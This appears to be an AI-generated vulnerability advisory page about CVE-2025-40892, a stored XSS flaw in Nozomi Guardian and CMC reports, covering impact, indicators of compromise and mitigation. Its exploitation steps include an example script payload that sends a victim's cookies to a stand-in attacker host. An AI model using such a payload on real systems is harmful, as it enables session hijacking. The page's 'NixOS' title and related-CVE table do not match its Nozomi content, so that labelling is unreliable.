CVE-2025-40892
NixOS vulnerability analysis and mitigation

Overview

CVE-2025-40892 is a Stored Cross-Site Scripting (XSS) vulnerability in the Reports functionality of Nozomi Networks Guardian and CMC (Central Management Console) products, caused by improper validation of an input parameter. An authenticated user with report privileges can embed a malicious JavaScript payload in a report, or socially engineer a victim into importing a malicious report template. All versions of Guardian and CMC prior to 25.5.0 are affected. The vulnerability was published on December 18, 2025, with a CVSS v3.1 base score of 8.9 (High) (Nozomi Advisory).

Technical details

The root cause is improper neutralization of user-supplied input in the Reports functionality (CWE-79), where an input parameter is not adequately sanitized before being rendered in the web interface. An authenticated attacker with low privileges can craft a report containing a JavaScript payload; when a victim views or imports the report, the script executes in the victim's browser context. The attack vector is network-based, requires low privileges, and necessitates user interaction (passive), with a changed scope indicating cross-context impact. No public proof-of-concept code has been identified (Nozomi Advisory, The Hacker Wire).

Impact

Successful exploitation allows the attacker to perform unauthorized actions in the victim's browser context, including modifying application data (high integrity impact), disrupting application availability (high availability impact), and accessing limited sensitive information (low confidentiality impact). Because Nozomi Networks Guardian and CMC are OT/ICS network monitoring platforms, compromise of these systems could undermine visibility into industrial network security posture and potentially facilitate further lateral movement within monitored environments (Nozomi Advisory).

Exploitability

There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation at this time. The EPSS score is approximately 0.034%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated attacker with report privileges and victim interaction, limiting opportunistic exploitation (Nozomi Advisory, The Hacker Wire).

Exploitation steps

  1. Reconnaissance: Identify a target Nozomi Networks Guardian or CMC instance running a version prior to 25.5.0 and obtain or compromise an account with report creation or import privileges.
  2. Craft malicious report: Create a report definition that embeds a JavaScript payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) within an improperly validated input parameter in the Reports functionality.
  3. Deliver the payload: Either save the malicious report directly within the application (stored XSS), or export it as a report template file and socially engineer the victim into importing it.
  4. Trigger execution: Wait for or induce the victim (e.g., an administrator) to view or import the malicious report, causing the JavaScript payload to execute in their browser context.
  5. Achieve objective: The executed script can steal session tokens, perform actions on behalf of the victim (data modification, configuration changes), or disrupt application availability (Nozomi Advisory).

Indicators of compromise

  • Logs: Unexpected JavaScript-like strings (e.g., <script>, onerror=, javascript:) appearing in report names, descriptions, or parameters within application audit logs.
  • Network: Outbound HTTP/HTTPS requests from administrator or analyst browsers to unknown external domains shortly after viewing or importing reports; unusual DNS queries from client workstations accessing the Guardian/CMC web interface.
  • Application: Newly created or recently modified reports with unusual content or encoding in report fields; unexpected report template imports from external or untrusted sources.
  • Browser/Session: Unexplained session activity or configuration changes performed under a legitimate user account without corresponding user-initiated actions.

Mitigation and workarounds

Nozomi Networks has released version 25.5.0 of both Guardian and CMC, which addresses this vulnerability. Organizations should update to version 25.5.0 or later as the primary remediation. As interim mitigations, restrict report creation and import privileges to trusted users only, disable the Reports functionality if not operationally required, and implement additional monitoring for suspicious report activity (Nozomi Advisory).

Community reactions

The vulnerability received coverage from The Hacker Wire, which highlighted the high-severity stored XSS risk to application reports and user sessions. CISA referenced the vulnerability in its weekly vulnerability bulletin (SB25-356). No significant researcher commentary or broader community debate has been identified beyond standard vulnerability tracking and aggregation (The Hacker Wire, CISA Bulletin).

Additional resources


SourceThis report was generated using AI

Related NixOS vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-75874CRITICAL10
  • NixOS logoNixOS
  • cpe:2.3:a:mozilla:firefox
NoYesAug 18, 2026
CVE-2026-74990CRITICAL9.8
  • NixOS logoNixOS
  • cpe:2.3:a:mozilla:firefox
NoYesAug 18, 2026
CVE-2026-74989CRITICAL9.8
  • NixOS logoNixOS
  • cpe:2.3:a:mozilla:firefox
NoYesAug 18, 2026
CVE-2026-74988CRITICAL9.8
  • NixOS logoNixOS
  • thunderbird
NoYesAug 18, 2026
CVE-2026-74987CRITICAL9.8
  • NixOS logoNixOS
  • MozillaFirefox-branding-upstream
NoYesAug 18, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management